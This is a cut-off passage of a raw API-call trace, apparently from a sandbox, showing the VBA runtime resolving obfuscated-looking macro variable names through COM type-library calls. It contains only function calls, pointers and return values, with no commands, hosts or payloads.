[0069.297] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.297] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wACQAD", lHashVal=0x108e59, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.297] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.297] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.297] IUnknown:Release (This=0x665ba50) returned 0xd [0069.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1217e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_wACQAD") returned 14 [0069.297] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wACQAD", lHashVal=0x108e59, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.298] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80266 | out: _Dst=0x144ec0) returned 0x0 [0069.298] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.298] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.298] IUnknown:Release (This=0x665ba50) returned 0xd [0069.298] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.298] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.298] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.298] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.298] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.298] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.298] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.298] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.298] IUnknown:Release (This=0x665ba50) returned 0xd [0069.298] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.298] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.298] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.298] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.298] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.298] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.298] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.299] IUnknown:Release (This=0x665ba50) returned 0xd [0069.299] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.299] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.299] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.299] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.299] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.299] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.299] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.299] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.299] IUnknown:Release (This=0x665ba50) returned 0xd [0069.299] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.299] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.299] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.299] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.299] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.299] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.299] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.299] IUnknown:Release (This=0x665ba50) returned 0xd [0069.299] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.299] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.299] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.299] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.299] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.299] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.300] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.300] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.300] IUnknown:Release (This=0x665ba50) returned 0xd [0069.300] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.300] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.300] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.300] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.300] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.300] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.300] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.300] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.300] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.300] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.300] IUnknown:Release (This=0x665ba50) returned 0xd [0069.300] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.300] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.301] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.301] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.301] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.301] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.301] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.301] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.301] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.301] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.301] IUnknown:Release (This=0x665ba50) returned 0xd [0069.301] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.301] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.301] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801be, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qXcUAUAX") returned 9 [0069.301] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qXcUAUAX", lHashVal=0x1011d6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801be, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qXcUAUAX") returned 9 [0069.301] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qXcUAUAX", lHashVal=0x1011d6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801be, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qXcUAUAX") returned 9 [0069.301] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qXcUAUAX", lHashVal=0x1011d6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.302] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qXcUAUAX") returned 0x1011d6 [0069.302] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="qXcUAUAX" | out: _Dst="qXcUAUAX") returned 0x0 [0069.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="qXcUAUAX") returned 9 [0069.302] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.302] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qXcUAUAX", lHashVal=0x1011d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.302] IUnknown:Release (This=0x665ba50) returned 0xd [0069.302] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.302] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qXcUAUAX", lHashVal=0x1011d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.302] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.302] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.302] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qXcUAUAX", lHashVal=0x1011d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.302] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.302] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.302] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qXcUAUAX", lHashVal=0x1011d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.302] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b801be, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qXcUAUAX") returned 9 [0069.302] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qXcUAUAX", lHashVal=0x1011d6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.302] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.302] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b801be | out: _Dst=0x67c2d40) returned 0x0 [0069.302] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qXcUAUAX") returned 0x10e99e [0069.302] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_qXcUAUAX" | out: _Dst="_B_var_qXcUAUAX") returned 0x0 [0069.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_qXcUAUAX") returned 16 [0069.302] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.302] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qXcUAUAX", lHashVal=0x10e99e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.302] IUnknown:Release (This=0x665ba50) returned 0xd [0069.302] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.302] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qXcUAUAX", lHashVal=0x10e99e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.303] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.303] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.303] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qXcUAUAX", lHashVal=0x10e99e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.303] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.303] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.303] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qXcUAUAX", lHashVal=0x10e99e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.303] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.303] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.303] IUnknown:Release (This=0x665ba50) returned 0xd [0069.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b121ae, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_qXcUAUAX") returned 16 [0069.303] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qXcUAUAX", lHashVal=0x10e99e, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.303] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b801be | out: _Dst=0x144ec0) returned 0x0 [0069.303] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IAA4AB", lHashVal=0x10c69d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b802b6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="IAA4AB") returned 7 [0069.303] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IAA4AB", lHashVal=0x10c69d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b802b6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="IAA4AB") returned 7 [0069.303] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IAA4AB", lHashVal=0x10c69d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.304] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAA4AB") returned 0x10c69d [0069.304] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="IAA4AB" | out: _Dst="IAA4AB") returned 0x0 [0069.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="IAA4AB") returned 7 [0069.304] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.304] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IAA4AB", lHashVal=0x10c69d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.304] IUnknown:Release (This=0x665ba50) returned 0xd [0069.304] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.304] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IAA4AB", lHashVal=0x10c69d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.304] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.304] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.304] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IAA4AB", lHashVal=0x10c69d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.304] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.304] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.304] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IAA4AB", lHashVal=0x10c69d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.304] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b802b6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="IAA4AB") returned 7 [0069.304] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IAA4AB", lHashVal=0x10c69d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.304] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.304] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b802b6 | out: _Dst=0x67c2d40) returned 0x0 [0069.304] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IAA4AB") returned 0x104107 [0069.304] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, 